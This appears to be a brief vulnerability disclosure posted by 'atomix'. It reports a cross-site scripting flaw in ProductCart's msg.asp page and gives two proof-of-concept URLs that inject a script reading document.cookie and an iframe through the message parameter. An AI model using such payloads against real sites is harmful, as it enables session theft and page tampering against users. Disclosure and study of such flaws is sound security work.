##################### # ProductCart XSS # # Vulnerability # # found by atomix # ##################### i came across the fact that in an area of ProductCart you are able to manipulate the error message, therefore allowing tags such as <script> and <iframe> to be used: http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert (document.cookie);</script> http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"% 20width=400%20height=400></iframe> -atomix | atom b0mbs
